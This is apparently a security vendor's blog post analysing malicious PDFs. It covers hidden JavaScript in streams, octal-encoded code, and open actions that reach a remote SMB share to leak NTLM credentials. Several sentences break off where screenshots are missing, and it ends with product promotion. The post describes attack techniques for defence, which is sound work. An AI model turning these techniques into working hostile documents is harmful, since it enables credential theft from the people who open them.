Most of us are no strangers to phishing attempts, and over the years we’ve kept you informed about the latest tricks used by attackers in the epidemic of phishing and spear-phishing campaigns that plague, in particular, email users. Like other files that can come as attachments or links in an email, PDF files have received their fair share of attention from threat actors, too. In this post, we’ll take you on a tour of the technical aspects behind malicious PDF files: what they are, how they work, and how we can protect ourselves from them.
Regular readers of the S1 blog will be familiar with the idea of malicious Office attachments that run VBA code from Macros or use DDE to deliver attacks, but not so well-known is how PDFs can execute code.
In some kinds of malicious PDF attacks, the PDF reader itself contains a vulnerability or flaw that allows a file to execute malicious code. Remember that PDF readers aren’t just applications like Adobe Reader and Adobe Acrobat. Most browsers contain a built in PDF reader engine that can also be targeted. In other cases, attackers might leverage AcroForms or XFA Forms, scripting technologies used in PDF creation that were intended to add useful, interactive features to a standard PDF document.
To get a better understanding of how such attacks work, let’s look at a typical PDF file structure. We can safely open a PDF file in a plain text editor to inspect its contents. At first glance, it might look indecipherable:
However, with a bit of knowledge of PDF file structure, we can start to see how to decode this without too much trouble. The body or contents of a PDF file are listed as numbered “objects”. These begin with the object’s index number, a generation number and the “obj” keyword, as we can see at lines 3 and 19, which show the start of the definitions for the first two objects in the file:
1 0 obj
2 0 obj
The end of each object is signalled with the keyword
endobj, as seen at lines 18 and 24 for Object 1 and Object 2, respectively.
Object 2 immediately offers us some clues. We can see that it contains a dictionary (signalled by the chevrons
JS 1 0 R
This tells us that the “garbage” code in Object 1 between the keywords
stream (line 8) and
As we’ve pointed out before, one thing you need to get used to when doing this kind of work is tidying up code to make it easier to work on. Here’s the same code after running it through a beautifier or prettifier in Sublime Text:
Compressed streams aren’t the only way PDF files can contain obfuscated code. Here’s another that looks a bit more of a worry when we look at its hash on VirusTotal:
As the image from VT makes clear, this is some kind of trojan that’s exploiting CVE-2018-4993. Let’s open it up and take a look inside.
This is a very small file. There’s only 4 objects, but the one that interests us is Object 3 and the value for the dictionary key
/AA. Note that this contains a child dictionary with key name
/O. That’s important because the
/O key specifies actions that should occur when a document is opened. And the value of this key is itself another dictionary containing
Unlike our previous file, however, this one does not specify a filter. Luckily, the value of “JS” is clearly recognisable as octal encoding. Octal (or “oct”) uses three digits between 0 and 7 to specify a single value. The best thing about
oct is we don’t need to roll up our Python sleeves to interpret it; we can just print it out directly on the command line:
Going back to the
/AA dictionary in the PDF, note the two lines which specify
This code issues the “Go To Remote” action, telling the reader application to jump to the destination specified under the
We can use
cURL to grab the headers from that IP address to see what we can learn.
Looks like we need some authentication to get past the server, and that’s exactly where the danger lies for Windows users. If the attacker has set up the remote file as an SMB share, then the crafted PDF’s attempt to jump to that location will cause an exchange between the user’s machine and the attacker’s server in which the user’s NTLM credentials are leaked.
This happens because when a user tries to access SMB shared files, Windows sends the user name and a hashed password to automatically try to log in. Although the hashed password is not the user’s actual password, the leaked credentials can both be used to set up SMB Relay attacks and, if the password is not particularly strong, the plain-text version can easily be retrieved from the hash by automated password-cracking tools.
Let’s see what VT makes of the IP address.
This host has a reputation as malicious, so there’s a good chance that this PDF file is, as suspected, trying to capture the users NTLM credentials.
In January this year, another kind of callback flaw was spotted in XFA forms. XFA (also known as “Adobe LiveCyle”) was introduced by Adobe in PDF v1.5 and allows PDFs to dynamically resize fields within a document, among other things. Unfortunately, XFA also lends itself to misuse. As explained in this POC, a stream can contain an xml-stylesheet that can also be used to initiate a direct connection to a remote server or SMB share.
In this stream, the reader will parse the URL and immediately attempt a connection. Although there are no known cases of this method being used in the wild to date, the researcher tested it against Adobe Acrobat Reader DC, version 19.010.20069.
While these mitigations are “nice to have” and certainly worth considering, bear in mind that these features were added, just like MS Office Macros, to improve usability and productivity. Therefore, be sure that you’re not disabling some functionality that is an important part of your own or your organization’s workflow.
For enterprise situations, you should ensure you have a good EDR security solution that can offer both full visibility into your network traffic, including encrypted communications, and which can offer comprehensive Firewall control. Of course, in these days, behavioral AI detection is a must-have to properly protect your network and assets from all attacks, including malicious PDF. SentinelOne customers can, in addition, scan PDF documents before they are accessed with our Nexus Embedded SDK.
Leveraging malicious PDFs is a great tactic for threat actors as there’s no way for the user to be aware of what code the PDF runs as it opens. Both the file format and file readers have a long history of exposed and, later, patched flaws. Because of the useful, dynamic features included in the document format, it’s reasonable to assume further flaws will be exposed and exploited by adversaries. With the ever-increasing tide of phishing and social engineering tactics targeting users, it’s vital that you remain vigilant about the dangers of PDFs and deploy a Next Gen security solution to prevent attacks.